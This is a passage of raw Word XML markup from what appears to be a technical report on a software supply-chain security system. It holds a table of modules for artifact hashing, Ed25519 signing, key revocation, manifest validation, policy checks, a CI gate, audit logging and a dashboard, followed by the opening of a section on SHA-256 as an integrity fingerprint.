      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.3 Component Responsibilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Modules and their security purpose</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2211"/>
        <w:gridCol w:w="3742"/>
        <w:gridCol w:w="3005"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Responsibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Security reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>vendor/build.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (SecureBuilder)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Streams the artifact through SHA-256 (64 KiB chunks); writes SLSA-style provenance with source repo, commit ID, build ID, timestamp, builder identity, dependencies with hashes and a security-tests flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Gives every release a fingerprint and ties it to an approved source and build</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>vendor/key_manager.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (KeyManager)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ed25519 key generation; PKCS#8 / SPKI PEM export with optional passphrase; SHA-256 key fingerprint; revoke, check and rotate keys via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>keys/revoked_keys.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Key lifecycle control: a leaked key can be invalidated at once</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>vendor/sign.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (ArtifactSigner)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Recomputes SHA-256, refuses revoked keys, builds the manifest, canonicalises it and signs it with Ed25519, then writes </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&lt;artifact&gt;.manifest.json</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> and logs SIGN_RELEASE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Binds the expected digest and release metadata to the vendor's identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>verifier/manifest.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (ManifestValidator)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Checks required fields and types, accepts only SHA-256 and Ed25519, and produces the canonical bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rejects malformed or downgraded manifests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>verifier/policy.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (SecurityPolicy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trusted signers, allowed key IDs, revoked versions, minimum version, required provenance, approved repositories, security tests passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Zero-trust admission control, anti-replay and anti-downgrade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>verifier/verify.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (ArtifactVerifier)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Six-stage verification with a status code and timing; audit-logs every outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The customer proves integrity and authenticity before use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>ci/security_gate.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Runs the verifier in a pipeline; exit 0 = ALLOWED/DEPLOY, exit 1 = BLOCKED/ABORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Automatic, fail-closed enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>audit/audit_logger.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (AuditLogger)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SQLite table </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>audit_logs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> for every event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Traceability and evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>dashboard/app.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Flask)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KPIs, audit log, CRL view and a live Verify button (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>/api/verify-primary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>/api/logs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Visibility for operators and assessors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.4 Cryptographic Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.1 SHA-256: integrity fingerprint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SHA-256 (FIPS 180-4 [4]) maps an input of any size to a 256-bit digest. Changing a single bit changes the digest completely, and finding a different file with the same digest is computationally infeasible (about 2^128 work for a collision). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>build.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sign.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>verify.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> all compute the digest by streaming the file in 64 KiB chunks. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SHA-256 on its own is not authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
